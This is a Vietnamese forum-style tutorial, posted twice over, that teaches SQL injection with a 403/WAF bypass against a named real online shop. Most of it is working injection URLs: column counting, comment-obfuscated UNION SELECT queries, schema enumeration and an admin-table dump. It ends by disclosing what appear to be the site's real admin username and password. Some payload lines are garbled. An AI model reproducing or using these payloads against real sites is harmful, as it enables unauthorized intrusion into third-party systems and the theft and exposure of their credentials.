http://www.mediafire.com/?noyg6ggdgpwl1lv
hi mọi người, hôm nay e xin làm cái TUT khai thác SQL bypass 403, vì có nhiều bạn khỏi khai thác nó thế nào
trong rum MMD đã có người post trang này ròi nhưng không biết nó thất lạc nơi đâu nên e xin post lại
victim: http://www.badalaonline.com/product_detail.php?id=940
các bạn tải hackbar cho dễ đi câu lệnh
linkdownload: https://addons.mozilla.org/vi/firefox/addon/hackbar/
đầu tiên là check lổi, thêm ' vào phía sau
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/badalaon/public_html/product_detail.php on line 9
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/badalaon/public_html/product_detail.php on line 14
lổi ròi
tìm cột lổi của nó
http://www.badalaonline.com/product_detail.php?id=940 order by 1-- -
vẫn bt vậy tăng lên xem
các bạn nhớ là nó chỉ có số 1 đến 100 thoi nha còn nếu như bạn order by 100-- - mà nó vẫn bt thỳ thêm ' vào sau
product_detail.php?id=940' order by 100-- - như thế đó.
tìm cột lổi của nó
http://www.badalaonline.com/product_detail.php?id=940 order by 25-- -
lổi vậy cái cột cần tìm nằm từ 20 đến 25
http://www.badalaonline.com/product_detail.php?id=940 order by 23-- - trở tại bt thỳ cột cần tìm là 23
403 nên mình sẽ bypass kiểu 403
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23-- -
ra 1 đống số
mình chọn số 2 đi nhá, xem version
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23-- -
5.1.56 => dễ khai thác, nếu nó bé hơn 5 thỳ khó lắm pro mới chơi dc
xem table name của nó
đây là 403 nên câu lệnh sẽ khác 1 chút
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where table_schema=database()-- -
nếu câu lệnh bt là:
http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION SELECT*/ 1,group_concat(/*!table_name*/),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23 /*!from information_schema.tables where table_schema=database()*/-- -
đó như thế, hoặc làm vậy mà k ra nữa thỳ thêm unhe
hex.....))
http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION SELECT*/ 1,unhehegroup_concat(/*!table_name*/))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23 /*!from information_schema.tables where table_schema=database()*/-- -
đó như thế. nó ra 1 table name là admin
còn nếu đi câu lệnh như thế mà nó k ra table name là admin
ví dụ nó ra table name là order đi, còn mình thì muốn là admin thỳ phải dùng limit
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where table_schema=database() limit 1,1-- -
cứ năng số đó từ 0,1 - 0,2 - 0,3....................
như thế đó trong trường hợp này thỳ nó ra admin ròi nên khỏi dùng limit
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,column_name),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!columns*/ where table_name=0x61646d696e limit 0,1-- -
nó ra 1 column name là uname => đây là username á
tăng limit lên mể tìm column password
hehe, pass => password
ok giờ mình sẽ xem nick admin
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,uname),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23 from admin-- -
username: admin
password: 645219
hi mọi người, hôm nay e xin làm cái TUT khai thác SQL bypass 403, vì có nhiều bạn khỏi khai thác nó thế nào
trong rum MMD đã có người post trang này ròi nhưng không biết nó thất lạc nơi đâu nên e xin post lại
victim: http://www.badalaonline.com/product_detail.php?id=940
các bạn tải hackbar cho dễ đi câu lệnh
linkdownload: https://addons.mozilla.org/vi/firefox/addon/hackbar/
đầu tiên là check lổi, thêm ' vào phía sau
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/badalaon/public_html/product_detail.php on line 9
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/badalaon/public_html/product_detail.php on line 14
lổi ròi
tìm cột lổi của nó
http://www.badalaonline.com/product_detail.php?id=940 order by 1-- -
vẫn bt vậy tăng lên xem
các bạn nhớ là nó chỉ có số 1 đến 100 thoi nha còn nếu như bạn order by 100-- - mà nó vẫn bt thỳ thêm ' vào sau
product_detail.php?id=940' order by 100-- - như thế đó.
tìm cột lổi của nó
http://www.badalaonline.com/product_detail.php?id=940 order by 25-- -
lổi vậy cái cột cần tìm nằm từ 20 đến 25
http://www.badalaonline.com/product_detail.php?id=940 order by 23-- - trở tại bt thỳ cột cần tìm là 23
403 nên mình sẽ bypass kiểu 403
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23-- -
ra 1 đống số
mình chọn số 2 đi nhá, xem version
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23-- -
5.1.56 => dễ khai thác, nếu nó bé hơn 5 thỳ khó lắm pro mới chơi dc
xem table name của nó
đây là 403 nên câu lệnh sẽ khác 1 chút
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where table_schema=database()-- -
nếu câu lệnh bt là:
http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION SELECT*/ 1,group_concat(/*!table_name*/),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23 /*!from information_schema.tables where table_schema=database()*/-- -
đó như thế, hoặc làm vậy mà k ra nữa thỳ thêm unhe
hex.....))http://www.badalaonline.com/product_detail.php?id=-940 /*!UNION SELECT*/ 1,unhe
hegroup_concat(/*!table_name*/))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23 /*!from information_schema.tables where table_schema=database()*/-- - đó như thế. nó ra 1 table name là admin
còn nếu đi câu lệnh như thế mà nó k ra table name là admin
ví dụ nó ra table name là order đi, còn mình thì muốn là admin thỳ phải dùng limit
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,table_name),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!tables*/ where table_schema=database() limit 1,1-- -
cứ năng số đó từ 0,1 - 0,2 - 0,3....................
như thế đó trong trường hợp này thỳ nó ra admin ròi nên khỏi dùng limit
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,column_name),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23 from information_schema./*!columns*/ where table_name=0x61646d696e limit 0,1-- -
nó ra 1 column name là uname => đây là username á
tăng limit lên mể tìm column password
hehe, pass => password
ok giờ mình sẽ xem nick admin
http://www.badalaonline.com/product_detail.php?id=-940 UNION /*!SELECT*/ 1,concat_ws(0x7c,uname),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23 from admin-- -
username: admin
password: 645219
SƯU TẦM
Đăng nhận xét